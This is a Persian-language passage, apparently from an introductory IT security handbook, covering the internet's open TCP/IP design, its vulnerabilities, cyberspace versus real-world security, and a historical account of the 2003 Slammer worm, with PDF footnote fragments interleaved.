‫ﻫﻤﻮﺍﺭﻩ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﻭﺻﻞ ﺑﺎﺷـﺪ‪ .‬ﻫﻤﭽﻨـﻴﻦ ﻣـﻲﺗﻮﺍﻧﻴـﺪ ﺩﺭﺑـﺎﺭﺓ‬
‫ﺧﺪﻣﺎﺗﻲ ﻛﻪ ﺍﺭﺍﺋﻪ ﻣﻲﺩﻫﻴـﺪ ﺗـﺼﻤﻴﻢﮔﻴـﺮﻱ ﻛﻨﻴـﺪ ﻭ ﻫـﺮ ﻛـﺲ‬
‫ﺩﻳﮕﺮﻱ ﻧﻴﺰ ﺩﺭﺻﻮﺭﺕ ﺍﺗـﺼﺎﻝ ﺑـﻪ ﺍﻳﻨﺘﺮﻧـﺖ ﻭ ﻛـﺴﺐ ﺍﺟـﺎﺯﻩ ﺍﺯ‬
‫‪Transmission Control Protocol/Internet‬‬
‫‪Protocol‬‬
‫‪Internet Engineering Task Force‬‬
‫‪Bandwidth‬‬
‫‪Wireless Local Area Networks‬‬
‫‪38‬‬
‫‪39‬‬
‫‪40‬‬
‫‪41‬‬
‫ﺑﺨﺶ ﺍﻭﻝ‬
‫ﺑﮕﻮﻧﻪﺍﻱ ﻛﻪ ﻣﺆﺛﺮ‪ ،‬ﻭﺍﻗﻊ ﮔﺮﺍﻳﺎﻧﻪ‪ ،‬ﻭ ﺑﺴﺎﺩﮔﻲ ﻗﺎﺑـﻞ ﭘﻴـﺎﺩﻩﺳـﺎﺯﻱ‬
‫ﺑﺎﺷﺪ‪.‬‬
‫ﺍﻳﻨﺘﺮﻧﺖ ﺑﺎﺯ ﺍﺳﺖ ﻭ ﻣﻲﺗﻮﺍﻥ ﺁﻧﺮﺍ ﺑﻌﻨﻮﺍﻥ ﺷـﺒﻜﻪﺍﻱ ﺍﺯ ﺷـﺒﻜﻪﻫـﺎ‬
‫ﺩﺭﻧﻈﺮ ﮔﺮﻓﺖ ﻛﻪ ﻫﺮ ﺷﺒﻜﻪﺍﻱ ﻛـﻪ ﺑـﻪ ﺧـﺎﻧﻮﺍﺩﻩﺍﻱ ﺍﺯ ﭘﺮﻭﺗﻜـﻞ‬
‫‪ ٣٨TCP/IP‬ﺗﻌﻠﻖ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﺁﻥ ﻣﺘـﺼﻞ ﺷـﻮﺩ ﻭ‬
‫ﺑﺨﺸﻲ ﺍﺯ ﺁﻥ ﻣﺤﺴﻮﺏ ﮔﺮﺩﺩ‪ .‬ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻳﻲ ﻛﻪ ﻣﺠﻤﻮﻋﺔ ﺍﻳـﻦ‬
‫ﭘﺮﻭﺗﻜﻠﻬﺎ ﺭﺍ ﺗﻌﺮﻳﻒ ﻣﻲﻛﻨﻨﺪ ﺗﻮﺳﻂ ‪ ٣٩IETF‬ﺍﺭﺍﺋﻪ ﻣـﻲﺷـﻮﻧﺪ ﻭ‬
‫ﻻ ﺑﺪﻧﺔ ﻓﻨﻲ ﻏﻴﺮﺭﺳﻤﻲ ﺁﻧﻬﺎ ﺑـﺮ ﺍﺳـﺎﺱ ﺷﺎﻳـﺴﺘﻪﺳـﺎﻻﺭﻱ‬
‫ﻣﻌﻤﻮ ﹰ‬
‫ﻓﻨﻲ ﻭ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺗﻮﺍﻓﻘﻲ ﺗﺪﻭﻳﻦ ﻣﻲﮔﺮﺩﺩ‪.‬‬
‫‪٣٦‬‬
‫ﺟﺎﻧﺐ ﺷﻤﺎ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﻭﺻﻞ ﺷﺪﻩ ﻭ ﺍﺯ ﺁﻥ ﺧـﺪﻣﺎﺕ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﺪ‪ .‬ﺍﻳﻨﺘﺮﻧﺖ ﺗﻮﺳﻂ ﻛـﺎﺭﺑﺮﺍﻥ ﻗﺎﺑـﻞ ﻛﻨﺘـﺮﻝ ﻭ ﺷـﻨﻮﺩ‬
‫ﺍﺳﺖ‪ ،‬ﺍﻣﺎ ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻛﺸﻮﺭﻫﺎ ﺷﻤﺎ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﻧﺘﺨـﺎﺏ ﻛﻨﻴـﺪ‬
‫ﻛﻪ ﭘﻴﺎﻣﻬﺎ ﻭ ﺳﺎﻳﺮ ﺩﺍﺩﻩﻫﺎﻱ ﺍﺭﺳـﺎﻟﻴﺘﺎﻥ ﺑـﺮﺍﻱ ﻣﻘﺎﺑﻠـﻪ ﺑـﺎ ﺷـﻨﻮﺩ‬
‫ﺭﻣﺰﮔﺬﺍﺭﻱ ﺷﻮﻧﺪ ﻳﺎ ﺧﻴﺮ‪.‬‬
‫ﺑﻌﻼﻭﻩ ﻏﺮﺑﺎﻝ ﻛﺮﺩﻥ ﭘﻴﺎﻣﻬﺎ ﺗﺤﺖ ﻛﻨﺘﺮﻝ ﺷﻤﺎ ﻣﻲﺑﺎﺷﺪ‪ ،‬ﻫﺮﭼﻨـﺪ‬
‫ﻛﻪ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ﻳﻚ ﻣﻨﺒﻊ ﺧـﺎﺭﺟﻲ ﺩﺭﺧﻮﺍﺳـﺖ ﻛﻨﻴـﺪ ﺍﻳﻨﻜـﺎﺭ ﺭﺍ‬
‫ﻼ ﺍﺯ ‪ ISP‬ﺧـﻮﺩ ﺑﺨﻮﺍﻫﻴـﺪ ﻛـﻪ‬
‫ﺑﺮﺍﻱ ﺷـﻤﺎ ﺍﻧﺠـﺎﻡ ﺩﻫـﺪ ‪ -‬ﻣـﺜ ﹰ‬
‫ﭘﻴﺎﻣﻬﺎﻱ ﻧﺎﻣﻄﻠﻮﺏ ﺭﺍ ﺑﺮﺍﺳﺎﺱ ﺿـﻮﺍﺑﻄﻲ ﻛـﻪ ﺧﻮﺩﺗـﺎﻥ ﺗـﺪﻭﻳﻦ‬
‫ﻣﻲﻛﻨﻴﺪ ﻏﺮﺑﺎﻝ ﻧﻤﺎﻳﺪ‪.‬‬
‫ﺍﻳﻨﺘﺮﻧﺖ ﻳﻚ ﺭﺳﺎﻧﺔ ﺗﻌﺎﻣﻠﻲ ﺍﺳﺖ؛ ﻣـﻲﺗﻮﺍﻧﻴـﺪ ﺑـﻪ ﺁﺳـﺎﻧﻲ ﻭ ﺑـﺎ‬
‫ﺳﺮﻋﺖ ﭼﻨﺪﻳﻦ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺭﺍ ﻣﺸﺎﻫﺪﻩ ﻛﻨﻴﺪ‪ ،‬ﻳﺎ ﺍﺯ ﺍﻓﺮﺍﺩ ﺑﺴﻴﺎﺭﻱ‬
‫ﭘﻴﺎﻣﻬﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﺭﻳﺎﻓﺖ ﻭ ﻳﺎ ﺑﻪ ﺁﻧﻬﺎ ﭘﻴﺎﻡ ﺍﺭﺳﺎﻝ ﻧﻤﺎﻳﻴﺪ‪ .‬ﺍﺯ‬
‫ﺁﻧﺠﺎ ﻛﻪ ﺯﻣﺎﻥ ﺍﻧﺘﻈﺎﺭ ﺑﺮﺍﻱ ﺧﺪﻣﺎﺕ ﺑـﺮﺧﻂ ﺑـﺴﺘﮕﻲ ﺑـﻪ ﻣﻴـﺰﺍﻥ‬
‫ﭘﻬﻨﺎﻱ ﺑﺎﻧﺪ ﺧﻂ ﺍﺭﺗﺒﺎﻃﻲ ﺷﻤﺎ ﺩﺍﺭﺩ‪ ،‬ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺭﻳﺎﻓﺖ ﭘﺎﺳـﺦ‬
‫ﺍﺯ ﺍﻳﻦ ﺧﺪﻣﺎﺕ ﻛﻤﻲ ﻃﻮﻝ ﺑﻜﺸﺪ‪.‬‬
‫ﺍﻳﻨﺘﺮﻧﺖ ﻣﻲﺗﻮﺍﻧﺪ ﺁﺳﻴﺐﭘﺬﻳﺮ ﺑﺎﺷﺪ؛ ﭼﺮﺍﻛﻪ ﺩﺭ ﺍﺑﺘﺪﺍ ﺍﺳﺎﺱ ﺁﻥ ﺑﺮ‬
‫ﺍﺭﺍﺋﻪ ﺧﺪﻣﺎﺕ ﺑﻪ ﮔﺮﻭﻫﻬﺎﻱ ﻫﻤﻜﺎﺭ ﻭ ﻧﺴﺒﺘﹰﺎ ﻣـﺸﺎﺑﻪ ﻣـﺮﺩﻡ ﻗـﺮﺍﺭ‬
‫ﺩﺍﺷﺖ ﻭ ﺑﺠﺎﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻣﻄﻤﺌﻦ‪،‬‬
‫ﺩﺭ ﺁﻥ ﺑﻪ ﻫﻤﻪ ﺍﻋﺘﻤﺎﺩ ﻣـﻲﺷـﺪ‪ .‬ﺍﻳـﻦ ﻛﺘـﺎﺏ ﺁﺳـﻴﺐﭘـﺬﻳﺮﻳﻬﺎﻱ‬
‫ﺍﻳﻨﺘﺮﻧــﺖ ﺭﺍ ﺑــﻪ ﺷــﻤﺎ ﺷﻨﺎﺳــﺎﻧﺪﻩ ﻭ ﻣﺠﻤﻮﻋــﻪﺍﻱ ﺍﺯ ﺍﻟﮕﻮﻫــﺎﻱ‬
‫ﺳــﺮﺁﻣﺪﻱ ﺍﻣﻨﻴﺘــﻲ ﺭﺍ ﺑــﺮﺍﻱ ﻛﻤــﻚ ﺑــﻪ ﺷــﻤﺎ ﺩﺭ ﻛــﺎﻫﺶ‬
‫ﺁﺳﻴﺐﭘﺬﻳﺮﻱ ﺍﺭﺍﺋﻪ ﻣﻲﻛﻨﺪ‪.‬‬
‫ﺑﺮ ﺍﺳﺎﺱ ﻣﺸﺨـﺼﻪﻫـﺎﻱ ﻓـﻮﻕ ﺗـﺎﻛﻨﻮﻥ ﺑﺎﻳـﺪ ﺩﺭ ﺫﻫـﻦ ﺧـﻮﺩ‬
‫ﺗﺼﻮﻳﺮﻱ ﺍﺯ ﺍﻳﻨﺘﺮﻧﺖ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ﺩﺭ ﺁﻥ ﻫـﺮ ﻧـﻮﻉ ﻓﻌﺎﻟﻴـﺖ‬
‫ﻣﺠﺎﺯ ﺍﺳﺖ ﻭ ﭼﻴﺰﻱ ﺩﺭ ﺁﻥ ﻣﺤﺪﻭﺩﻳﺖ ﻧـﺪﺍﺭﺩ ﻭ ﺗﺤـﺖ ﻛﻨﺘـﺮﻝ‬
‫ﻧﻴــﺴﺖ‪ .‬ﺍﻳــﻦ ﻓــﻀﺎﻱ ﺑــﺎﺯ ﺑﺨــﻮﺑﻲ ﺭﻳــﺸﻪﻫــﺎﻱ ﭘﮋﻭﻫــﺸﻲ ﻭ‬
‫ﺩﺍﻧﺸﮕﺎﻫﻲ ﺍﻳﻨﺘﺮﻧﺖ ﺭﺍ ﻧﺸﺎﻥ ﻣﻲﺩﻫﺪ ﻭ ﻓﻮﺍﻳﺪ ﺁﻧﺮﺍ ﺑـﺮﺍﻱ ﺗﻤـﺎﻣﻲ‬
‫ﺍﻗﺸﺎﺭ ﺟﺎﻣﻌﻪ ﻣﻲ ﻧﻤﺎﻳﺎﻧﺪ‪ .‬ﺍﻳﻨﺘﺮﻧـﺖ ﺑـﺎ ﻫـﺪﻑ ﺑﺮﻗـﺮﺍﺭﻱ ﺍﻣﻨﻴـﺖ‬
‫ﻃﺮﺍﺣﻲ ﻧﺸﺪﻩ‪ ،‬ﺑﻠﻜﻪ ﺑﺮﺍﻱ ﺍﻓﺰﺍﻳﺶ ﺛﻤﺮﺍﺕ ﻓﻌﺎﻟﻴﺘﻬـﺎﻱ ﻣـﺸﺘﺮﻙ‬
‫ﺑﻮﺟﻮﺩ ﺁﻣﺪﻩ ﺍﺳﺖ‪ .‬ﺍﻳﻦ ﻣﻴـﺰﺍﻥ ﺁﺯﺍﺩﻱ ﻋﻤـﻞ ﻓﺮﺻـﺘﻬﺎﻳﻲ ﺑـﺮﺍﻱ‬
‫ﺍﻓﺮﺍﺩ ﺍﻳﺠﺎﺩ ﻣﻲﻛﻨﺪ ﻛﻪ ﺑﺘﻮﺍﻧﻨﺪ ﺍﺯ ﺷﺒﻜﻪﻫﺎ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨـﺪ ﻭ‬
‫ﺑﻪ ﺩﻳﮕﺮﺍﻥ ﺁﺳﻴﺒﻬﺎﻱ ﺟﺪﻱ ﻭﺍﺭﺩ ﻧﻤﺎﻳﻨﺪ‪ .‬ﻣﺎ ﺍﺑﺘـﺪﺍ ﺑﺎﻳـﺪ ﻣﺎﻫﻴـﺖ‬
‫ﺍﻳﻦ ﻧﻮﻉ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩﻫﺎ ﺭﺍ ﺩﺭﻙ ﻛﺮﺩﻩ ﻭ ﺳﭙﺲ ﺷﺒﻜﻪﻫﺎﻱ ﺧﻮﺩ‬
‫ﺭﺍ ﺩﺭ ﻣﻘﺎﺑﻞ ﺁﻧﻬﺎ ﺍﻣﻦ ﻛﻨﻴﻢ‪.‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﻣﻮﺿﻮﻋﺎﺕ ﻣﻄﺮﺡ ﺩﺭ ﺣﻮﺯﺓ ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ‬
‫ﻣﻔﺎﻫﻴﻢ ﺭﺍﻳﺎﻧﻪ‪ ،‬ﺷﺒﻜﻪ ﻭ ﺍﻣﻨﻴﺖ ﺩﺍﺩﻩﻫﺎ ﺩﺭ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﻫﻤﺎﻧﻨـﺪ‬
‫ﺩﻧﻴﺎﻱ ﻭﺍﻗﻌﻲ ﻫﺴﺘﻨﺪ‪ ،‬ﻭﻟﻲ ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻱ ﭘﻴـﺎﺩﻩﺳـﺎﺯﻱ ﺭﻭﺍﻟﻬـﺎﻱ‬
‫ﻼ ﺑﺮﺍﻱ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺣـﺴﺎﺑﻬﺎﻱ‬
‫ﻣﺮﺗﺒﻂ ﺑﺎ ﺁﻧﻬﺎ ﻣﺘﻔﺎﻭﺕ ﺍﺳﺖ‪ .‬ﻣﺜ ﹰ‬
‫ﻛﺎﺭﺑﺮﻱ ﻛﻪ ﺍﺟﺎﺯﺓ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺍﻃﻼﻋﺎﺕ ﻳﺎ ﺧـﺪﻣﺎﺕ ﺭﺍ ﻓـﺮﺍﻫﻢ‬
‫ﻣﻲﺁﻭﺭﻧﺪ‪ ،‬ﺑﻪ ﺟﺎﻱ ﻛﻠﻴـﺪﻫﺎﻱ ﻓﻴﺰﻳﻜـﻲ ﻳـﺎ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ‪ ،‬ﺩﺍﺭﺍﻱ‬
‫ﺷﻨﺎﺳﺔ ﻛﺎﺭﺑﺮﻱ‪ ٤٢‬ﻭ ﺭﻣﺰ ﻋﺒـﻮﺭ‪ ٤٣‬ﻫـﺴﺘﻴﻢ ﻭ ﺑﺠـﺎﻱ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ‬
‫ﭘﺎﻛﺘﻬﺎﻱ ﺩﺭﺑﺴﺘﻪ ﺑﺮﺍﻱ ﺍﻧﺘﻘﺎﻝ ﺍﻃﻼﻋﺎﺕ ﻣﻲﺗﻮﺍﻧﻴﻢ ﺩﺍﺩﺓ ﺍﻧﺘﻘـﺎﻟﻲ‬
‫ﺭﺍ ﺑﻪ ﻧﺤﻮﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻛﻨﻴﻢ ﻛﻪ ﺗﻮﺳﻂ ﺍﻓﺮﺍﺩ ﻧﺎﺷﻨﺎﺱ‪ ،‬ﻏﻴﺮﻗﺎﺑﻞ‬
‫ﺧﻮﺍﻧﺪﻥ ﺑﺎﺷﺪ‪.‬‬
‫ﺩﺭ ﻣﻘﺎﻳﺴﺔ ﺩﻧﻴﺎﻱ ﻭﺍﻗﻌﻲ ﺑﺎ ﻓﻀﺎﻱ ﺳـﺎﻳﺒﺮ ﻣـﻲﺗـﻮﺍﻧﻴﻢ ﺗﺨﻠﻔـﺎﺕ‬
‫ﻣﺸﺎﺑﻬﻲ ﺭﺍ ﺩﺭ ﻣﻮﺭﺩ ﻗﺎﺑﻠﻴﺖ ﺍﻃﻤﻴﻨﺎﻥ ﻭ ﻣﺤﺮﻣـﺎﻧﮕﻲ ﺑﺒﻴﻨـﻴﻢ‪ .‬ﺩﺭ‬
‫ﻫﺮ ﺩﻭﻱ ﺁﻧﻬﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﺁﺩﺭﺳﻬﺎﻱ ﻧﺎﺩﺭﺳﺖ ﻭ ﻳـﺎ ﺍﻣـﻀﺎﻫﺎﻱ‬
‫ﺟﻌﻠﻲ ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪ .‬ﺩﺭ ﻫﺮ ﺩﻭ ﻓﻀﺎ ﺍﻣﻜﺎﻥ ﺍﺭﺍﺋﻪ ﺍﻃﻼﻋـﺎﺕ‬
‫ﻏﻠﻂ ﻳﺎ ﮔﻤﺮﺍﻩﻛﻨﻨﺪﻩ ﻧﻴﺰ ﻭﺟﻮﺩ ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ‪ .‬ﻫﻤﭽﻨـﻴﻦ ﺍﻣﻜـﺎﻥ‬
‫ﺑـﻪ ﺍﺷـﺘﺒﺎﻩ ﺍﻧــﺪﺍﺧﺘﻦ ﺍﺷــﺨﺎﺹ ﺑـﺎ ﺍﻃﻼﻋــﺎﺕ ‪ -‬ﭼــﻪ ﺑــﺼﻮﺭﺕ‬
‫ﺗﺼﺎﺩﻓﻲ ﻭ ﭼﻪ ﺍﺯ ﺭﻭﻱ ﻋﻤﺪ ‪ -‬ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺑﺎﻋـﺚ ﻣـﻲﺷـﻮﺩ‬
‫ﻧﺘــﻮﺍﻥ ﺗﻌﻴــﻴﻦ ﻛــﺮﺩ ﻛــﻪ ﭼــﻪ ﺍﻃﻼﻋــﺎﺗﻲ ﻣﻬــﻢ ﻭ ﻗﺎﺑــﻞ ﺗﺄﻳﻴــﺪ‬
‫ﻫﺴﺘﻨﺪ‪ ٤٤.‬ﺩﺳﺖ ﺁﺧﺮ ﺍﻳﻨﻜﻪ ﺩﺭ ﻫـﺮ ﺩﻭ ﻓـﻀﺎ ﺍﻣﻜـﺎﻥ ﺩﺳﺘﺮﺳـﻲ‬
‫ﻏﻴﺮﻣﺠﺎﺯ ﺑﻪ ﺍﻃﻼﻋﺎﺕ ﻣﺤﺮﻣﺎﻧﻪ ﻭ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻧﻬﺎ ﺑﺮﺍﻱ ﻣﻘﺎﺻـﺪ‬
‫ﻏﻴﺮﻗﺎﻧﻮﻧﻲ ﻧﻴﺰ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪.‬‬
‫ﺍﻣﺎ ﺑﺎ ﻫﻤﺔ ﺍﻳﻦ ﺷﺒﺎﻫﺘﻬﺎ ﺳﻪ ﺗﻔﺎﻭﺕ ﻋﻤﺪﻩ ﻣﻴـﺎﻥ ﺍﻳـﻦ ﺩﻭ ﻓـﻀﺎ‬
‫ﻣﺸﺎﻫﺪﻩ ﻣﻲﺷﻮﺩ‪:‬‬
‫ﺍﻭﻝ‪ :‬ﻫﺮ ﻧﻮﻉ ﻧﻘﺾ ﺍﻣﻨﻴﺖ ﺩﺭ ﻓـﻀﺎﻱ ﺳـﺎﻳﺒﺮ ﻣـﻲﺗﻮﺍﻧـﺪ ﺑـﺴﻴﺎﺭ‬
‫ﺳﺮﻳﻊ ﺍﺗﻔﺎﻕ ﺑﻴﺎﻓﺘﺪ؛ ﻳﻌﻨﻲ ﺗﺎ ﺯﻣﺎﻧﻴﻜﻪ ﺑﺨﻮﺍﻫﻴﺪ ﺁﮔـﺎﻩ ﺷـﻮﻳﺪ ﭼـﻪ‬
‫ﺍﺗﻔﺎﻗﻲ ﺑﺮﺍﻱ ﺳﺮﻣﺎﻳﻪﻫﺎﻱ ﺷﻤﺎ ﺍﻓﺘﺎﺩﻩ‪ ،‬ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﻳﮕﺮ ﺑـﺮﺍﻱ‬
‫ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﻭﺍﺭﺩ ﺁﻣﺪﻥ ﺧﺴﺎﺭﺕ ﺑﺴﻴﺎﺭ ﺩﻳـﺮ ﺷـﺪﻩ ﺑﺎﺷـﺪ‪ .‬ﺍﻟﺒﺘـﻪ‬
‫ﺗﻤﺎﻣﻲ ﺣﻤﻼﺕ ﺳﺮﻳﻊ ﺍﺗﻔﺎﻕ ﻧﻤﻲﺍﻓﺘﻨﺪ؛ ﺑﻠﻜﻪ ﺑﻌـﻀﻲ ﺍﺯ ﺁﻧﻬـﺎ ﺩﺭ‬
‫ﻫﻨﮕﺎﻡ ﻭﻗﻮﻉ ﻗﺎﺑﻞ ﻣﺸﺎﻫﺪﻩﺍﻧﺪ ﻭ ﺑﺮﺍﻱ ﺑﻪ ﻧﺘﻴﺠﻪ ﺭﺳـﻴﺪﻥ ﺯﻣـﺎﻥ‬
‫‪Username‬‬
‫‪Password‬‬
‫‪۴۴‬‬
‫ﻛﺎﭘﻴﺘﺎﻥ ﻛﺸﺘﻲ ﻣﻌﺮﻭﻑ ﺗﺎﻳﺘﺎﻧﻴـﻚ ﺍﺯ ﺭﺍﺩﻳـﻮﻱ ﺍﻭﻟﻴـﻪ ﺑـﺮﺍﻱ ﺑﺮﻗـﺮﺍﺭﻱ‬
‫ﺗﻤﺎﺱ ﺍﺯ ﻛﺸﺘﻲ ﺑﺎ ﺳﺎﺣﻞ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﺮﺩ‪ .‬ﻣﻨﺸﻲ ﺭﺍﺩﻳﻮ ﻛﻪ ﺍﻭﻟﻴﻦ ﺳﻔﺮ‬
‫ﺩﺭﻳﺎﻳﻲ ﺧﻮﺩ ﺭﺍ ﺗﺠﺮﺑـﻪ ﻣـﻲﻛـﺮﺩ ﺁﻧﻘـﺪﺭ ﭘﻴﺎﻣﻬـﺎﻱ ﺷﺨـﺼﻲ ﺩﺭﻳﺎﻓـﺖ‬
‫ﻣﻲﻧﻤﻮﺩ ﻛﻪ ﻳﻚ ﭘﻴﺎﻡ ﻣﻬﻢ ‪ -‬ﻫﺸﺪﺍﺭ ﺩﺭ ﻣﻮﺭﺩ ﻳﻚ ﻛﻮﻩ ﻳﺨـﻲ ﺑـﺰﺭﮒ‬
‫ﺩﺭ ﻣﺴﻴﺮ ﺣﺮﻛﺖ ﻛﺸﺘﻲ ‪ -‬ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﭘﻴﺎﻡ ﻣﻬﻢ ﻭ ﺷﺎﻳـﺴﺘﺔ ﭘﻴﮕﻴـﺮﻱ‬
‫ﺷﻨﺎﺳﺎﻳﻲ ﻧﺸﺪ‪ .‬ﻧﺘﻴﺠﻪ ﺍﻳﻦ ﺑﻮﺩ ﻛﻪ ﻛﺸﺘﻲ ﺑﺎ ﻛﻮﻩ ﻳﺨﻲ ﺑﺮﺧﻮﺭﺩ ﻛـﺮﺩ ﻭ‬
‫ﭼﻨﺪ ﺳﺎﻋﺖ ﺑﻌﺪ ﻏﺮﻕ ﺷﺪ‪.‬‬
‫‪42‬‬
‫‪43‬‬
‫‪٣٧‬‬
‫ﺑﺨﺶ ﺍﻭﻝ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻋﺼﺮ ﺩﻳﺠﻴﺘﺎﻝ‬
‫ﺑﻪ ﮔﺰﺍﺭﺷﻬﺎﻱ ﺯﻳﺮ ﺩﺭﺑﺎﺭﺓ ﻛﺮﻡ ‪ Slammer‬ﻛﻪ ﺩﺭ ﺍﻭﺍﻳﻞ ﺳـﺎﻝ‬
‫‪ ۲۰۰۳‬ﻣﻴﻼﺩﻱ ﺑﺎﻋﺚ ﺧﺮﺍﺑﻲ ﺷﺪﻳﺪ ﺩﺭ ﻛﺎﺭ ﺍﻳﻨﺘﺮﻧﺖ ﺷـﺪ ﺗﻮﺟـﻪ‬
‫ﻛﻨﻴﺪ‪ .‬ﺩﺭ ﺍﺛﺮ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺍﻳﻦ ﻛﺮﻡ‪ ،‬ﻛﺸﻮﺭﻫﺎﻱ ﺯﻳـﺎﺩﻱ ﺍﺯ ﺗﻤـﺎﻣﻲ‬
‫ﭘﻨﺞ ﻗﺎﺭﺓ ﺟﻬﺎﻥ ﺁﻟﻮﺩﻩ ﺷـﺪﻧﺪ ﻭ ﺑﺨـﺶ ﻋﻤـﺪﺓ ﺧﺮﺍﺑﻴﻬـﺎ ﻧـﺼﻴﺐ‬
‫ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﺷﺪ‪:‬‬
‫‪) Slammer‬ﻛﻪ ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ‪ Sapphire‬ﻧﻴﺰ ﻧﺎﻣﻴﺪﻩ ﻣﻲﺷـﻮﺩ(‬
‫ﺳــﺮﻳﻌﺘﺮﻳﻦ ﻛــﺮﻡ ﺭﺍﻳﺎﻧــﻪﺍﻱ ﺍﺳــﺖ ﻛــﻪ ﺩﺭ ﻃــﻮﻝ ﺣﻴــﺎﺕ‬
‫ﺭﺍﻳﺎﻧﻪﻫﺎ ﻣﻨﺘﺸﺮ ﺷﺪﻩ‪ .‬ﺑﺎ ﺷـﺮﻭﻉ ﮔـﺴﺘﺮﺵ ﺁﻥ ﺩﺭ ﺳﺮﺍﺳـﺮ‬
‫ﺍﻳﻨﺘﺮﻧﺖ‪ ،‬ﺑﻴﺶ ﺍﺯ ‪ %۹۰‬ﻣﻴﺰﺑﺎﻧﻬﺎﻱ‪ ٤٥‬ﺁﺳﻴﺐﭘﺬﻳﺮ ﺩﺭ ﻋﺮﺽ‬
‫‪ ۱۰‬ﺩﻗﻴﻘﻪ ﺁﻟﻮﺩﻩ ﺷﺪﻧﺪ ﻭ ﺍﻳﻦ ﺍﻣﺮ ﻣﻮﺟﺐ ﺍﺧﺘﻼﻝ ﺩﺭ ﺍﻧﺠﺎﻡ‬
‫ﺩﺍﺩ ﻭ ﺳـﺘﺪﻫﺎﻱ ﻣــﺎﻟﻲ ﻭ ﺍﻣــﻮﺭ ﺣﻤـﻞ ﻭ ﻧﻘــﻞ ﻣﺆﺳــﺴﺎﺕ‬
‫ﺩﻭﻟﺘﻲ ﺷﺪ ﻭ ﺟـﺎﻳﻲ ﺑـﺮﺍﻱ ﻋﻜـﺲﺍﻟﻌﻤـﻞ ﺍﻧـﺴﺎﻧﻲ ﺑـﺎﻗﻲ‬
‫ﻧﮕﺬﺍﺷﺖ‪...‬‬
‫‪ Slammer‬ﻗﺒــﻞ ﺍﺯ ﺳــﺎﻋﺖ ‪ ٤٦UTC ۵:۳۰‬ﺭﻭﺯ ﺷــﻨﺒﻪ‬
‫‪ ۲۵‬ﮊﺍﻧﻮﻳــﻪ ‪ ۲۰۰۳‬ﻣــﻴﻼﺩﻱ ﺑــﺎ ﺑﻬــﺮﻩﺑــﺮﺩﺍﺭﻱ ﺍﺯ ﻳــﻚ‬
‫ﺁﺳﻴﺐﭘﺬﻳﺮﻱ ﺳﺮﺭﻳﺰﻱ ﺑـﺎﻓﺮ‪ ٤٧‬ﺑـﺎ ﻧﻔـﻮﺫ ﺑـﻪ ﺭﺍﻳﺎﻧـﻪﻫـﺎﻱ‬
‫ﻣﺘﺼﻞ ﺑﻪ ﺍﻳﻨﺘﺮﻧـﺖ ﻛـﻪ ﻧـﺮﻡﺍﻓـﺰﺍﺭ ‪Microsoft SQL‬‬
‫‪ Server‬ﻳﺎ ‪Microsoft SQL Desktop Engine‬‬
‫)‪ 2000 (MSDE‬ﺭﺍ ﺍﺟﺮﺍ ﻣﻲﻛﺮﺩﻧﺪ ﻧﻔﻮﺫ ﻛﺮﺩ ﻭ ﺑﻪ ﺁﺭﺍﻣﻲ‬
‫ﺍﻗﺪﺍﻡ ﺑﻪ ﺁﻟﻮﺩﻩ ﺳﺎﺧﺘﻦ ﺗﻤﺎﻣﻲ ﺭﺍﻳﺎﻧﻪﻫـﺎﻱ ﻣﻴﺰﺑـﺎﻥ ﻧﻤـﻮﺩ‪.‬‬
